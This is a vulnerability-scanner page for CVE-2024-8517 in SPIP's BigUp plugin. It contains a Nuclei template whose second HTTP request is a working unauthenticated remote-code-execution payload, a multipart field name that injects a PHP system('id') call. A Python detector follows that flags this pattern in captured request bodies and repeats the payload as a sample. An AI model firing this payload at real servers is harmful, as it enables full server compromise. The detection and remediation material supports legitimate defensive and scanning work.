| Title | Published | Views | Family |
|---|---|---|---|
| SPIP BigUp 4.3.1 / 4.2.15 / 4.1.17 Unauthenticated Remote Code Execution Exploit | 14 Sep 2024 00:00 | – | zdt |
| Exploit for Reliance on File Name or Extension of Externally-Supplied File in Spip | 1 Aug 2025 11:14 | – | githubexploit |
| eCPPT-Penetration-Testing-Reports | 3 Jun 2026 00:02 | – | githubexploit |
| Exploit for Reliance on File Name or Extension of Externally-Supplied File in Spip | 6 Sep 2024 18:17 | – | githubexploit |
| March Linux Patch Wednesday | 20 Mar 2025 20:49 | – | avleonov |
| CVE-2024-8517 | 6 Sep 2024 19:06 | – | circl |
| SPIP security vulnerability | 6 Sep 2024 00:00 | – | cnnvd |
| CVE-2024-8517 | 6 Sep 2024 15:55 | – | cve |
| CVE-2024-8517 SPIP Bigup Multipart File Upload OS Command Injection | 6 Sep 2024 15:55 | – | cvelist |
| CVE-2024-8517 | 6 Sep 2024 15:55 | – | debiancve |

```yaml
id: CVE-2024-8517

info:
  name: SPIP BigUp Plugin - Remote Code Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.
  impact: |
    Unauthenticated attackers can execute arbitrary operating system commands through crafted multipart file upload requests, achieving complete server compromise and full control of the SPIP installation.
  remediation: |
    Update SPIP to version 4.3.2, 4.2.16, or 4.1.18 or later to address the command injection vulnerability in the BigUp plugin.
  reference:
    - https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html
    - https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_2_a_big_upload/
    - https://vulncheck.com/advisories/spip-upload-rce
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-8517
    cwe-id: CWE-646
    epss-score: 0.94618
    epss-percentile: 0.99845
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.favicon.hash:-1224668706
    fofa-query: "X-Spip-Cache"
  tags: cve,cve2024,intrusive,spip,rce,vuln

flow: http(1) && http(2)

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'formulaire_action_args'
          - 'spip'
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: formulaire
        regex:
          - name=['"]formulaire_action_args['"]\s*type=['"]hidden['"]\s*value=['"]([^'"]+)['"]
        internal: true

  - raw:
      - |
        POST /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=5f02b65945d644d6a32847ab130e9586

        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="page"

        spip_pass
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="lang"

        fr
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action"

        oubli
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action_args"

        {{formulaire}}
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action_sign"


        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="oubli"

        {{email}}
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="nobot"


        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="bigup_retrouver_fichiers"

        a
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="RCE['.system('id').die().']"; filename="{{filename}}.txt"
        Content-Type: text/plain

        {{string}}
        --5f02b65945d644d6a32847ab130e9586--

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207e89ad528a0c073323c528bbac7d3408978b4b1db18834318eb29cd8d63b7686022100a2c413d47efe761c88e53fac635208fff75cb60b47268562acfa0b1d31b3eb2c:922c64590222798bb761d5b6d8e72950
```
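
A defender-side counterpart to the template's second request, added here as an example (it is not part of the template or of SPIP): it scans a captured multipart body, for instance from a WAF or reverse-proxy log, and flags file parts whose form field name is not a plain identifier when the `bigup_retrouver_fichiers` field is present. The function name, the allow-list pattern and the sample bodies are assumptions constructed for this example.

```python
import re

# Assumed allow-list: an identifier with optional [key] suffixes, e.g. fichiers[0].
SAFE_NAME = re.compile(r'^[A-Za-z0-9_-]+(\[[A-Za-z0-9_-]*\])*$')

# Content-Disposition header of one multipart part; filename is optional.
DISPOSITION = re.compile(
    r'^Content-Disposition:\s*form-data;\s*name="(?P<name>[^"]*)"'
    r'(?:;\s*filename="(?P<filename>[^"]*)")?',
    re.IGNORECASE | re.MULTILINE,
)

BIGUP_MARKER = "bigup_retrouver_fichiers"  # field name taken from the template


def suspicious_bigup_parts(body):
    """Return field names of file parts that fail the allow-list.

    Only bodies that also carry the BigUp marker field are considered,
    matching the request shape shown in the template above.
    """
    parts = [(m["name"], m["filename"]) for m in DISPOSITION.finditer(body)]
    if BIGUP_MARKER not in {name for name, _ in parts}:
        return []
    return [n for n, fn in parts if fn is not None and not SAFE_NAME.match(n)]


def _multipart(parts, boundary="xEXAMPLEx"):
    """Build a constructed multipart body from (name, filename, value) tuples."""
    lines = []
    for name, filename, value in parts:
        disp = f'Content-Disposition: form-data; name="{name}"'
        if filename is not None:
            disp += f'; filename="{filename}"'
        lines += [f"--{boundary}", disp, "", value]
    lines.append(f"--{boundary}--")
    return "\r\n".join(lines)


# Constructed samples: one shaped like the template's probe, one benign upload.
COMMON = [("page", None, "spip_pass"), (BIGUP_MARKER, None, "a")]
PROBE = _multipart(COMMON + [("RCE['.system('id').die().']", "abcde.txt", "x")])
BENIGN = _multipart(COMMON + [("fichiers[0]", "report.pdf", "x")])

if __name__ == "__main__":
    print(suspicious_bigup_parts(PROBE))
    print(suspicious_bigup_parts(BENIGN))
```

A hit on an installation older than 4.3.2, 4.2.16 or 4.1.18 is a reason to treat the host as potentially compromised and to apply the update named in the remediation field.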